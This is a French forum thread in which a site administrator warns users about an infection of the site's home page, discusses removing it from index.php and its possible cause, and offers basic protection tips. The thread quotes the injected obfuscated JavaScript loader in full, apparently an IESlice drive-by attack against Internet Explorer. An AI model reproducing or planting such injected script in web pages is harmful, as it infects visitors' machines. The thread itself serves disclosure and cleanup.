Bonjour Dgino, Salut Peps,

Oui vous n'êtes pas les seuls. J'ai été informé par d'autres personnes qu'il y avait un virus dans la page d'accueil du site.

Néanmoins j'arrivais pas à voir ce qui se passait de mon côté vu que mon anti-virus ne réagissait pas.

Je viens juste de trouver un episte ce matin et j'allais donc en parler dans le forum donc ton post tombe bien.

Si vous allez sur la page d'accueil du site et regardez le code source de la page vous allez trouver un truc du style:

<!--b8c0296d117d0b3baf67778736b8011a-><script language=javascript>mdjg="%";umgbr="<scripw74w20law6eguw61gew3djaw76asw63riw70tw3ew20w20funw63tw69w6fnw20zw78kw28r)w7bvaw72 w66w2caw68w77=w22w4dw34^*=w72w7dw24'sw75w49w38w60w54Gw5dw5a~1&w40vtw6a0ymw23qaUOw42)w35w28w489xF;|f7w3a6w6cw43Ehw7bw69Vcbw5cw22w4bd3ow6bw5bw5f.w7aPw32!Np w2bgw6ew77w65w2d,w41J\",yw65w78w3d\"\",a,mw61e,w75w3d\"w22,sew3bfor(w66w3dw30;w66<r.lengw74h;w66++)w7b a=rw2ew63haw72w41tw28w66)w3bw6dae=aw68w77w2eindexOf(aw29;w69f(mae>-1w29w7bw20sw65=w28(w6daew2b1)w25w381-w31);iw66(w73ew3c=0)se+=w381;u+=ahw77.chw61rw41w74(w73e-1); w7dw20w65lse w75+w3da;}w79w65xw2b=uw3bdow63w75mew6ew74w2ew77ritew28yex);}<w2fscw72iptw3e";kwaqf=unescape(umgbr.replace(/w/g,mdjg));var h,gr;document.write(kwaqf);h="<ub}V j+CUwnIUn-rK0UtUub}V jK>+3kbI#-wjze}Vj-H+K<SER82G+CUwnIUn-r\\KMUtUSb}V j\\K+SREr\\K{jj 6//eeeznkknC-UwUCVjVbuzw-j/..Ij\"z0u?Kg3kbI#-wjz}-7-}}-}gK\\K><\\/SER82G>K+5|+</ub}V j>++";zxk(h);</script>

et ça c'est notre virus trojan/cheval de troie

Il s'agit du virus IESlice qui attaque une vulnérabilité d'internet explorer.

Pour plus d'info sur ce IESlice : zataz.com - ieslice

Je n'ai pas encore trouvé la solution pour le supprimer. Je ne l'ai pas trouvé dans la base de données.

En attendant je vous conseille de toujours vous protéger sur le net.

C'est à dire:

1 - un anti-virus performant (Avast a une version gratuite et est très efficace)
2 - un pare feu ou firewall (un à disposition dans windows)
3 - mise à jour automatique de windows update activé
4 - installer Firefox 3 plutôt que Internet Explorer plus performant et plus sûr surtout que par ex ce type de virus ne s'attaque qu'à IE.

Je vous tiens au courant.

Veda,
Je ne vois pas le script dans la source de la page...serait-ce que tu as réglé ce problème?
Sinon, si je peux t'aider, fais-moi signe.

Ah ben voilà j'ai trouvé et supprimé. Il se trouvait dans l'index.php et non template.php etc...ou la base de données.

Comment ils ont fait pour pouvoir y accéder, ça je l'ignore. Tu as une idée?

Salut Veda,

Si ton hébergeur utilise Cpanel, c'est peut-être la cause de tes problèmes !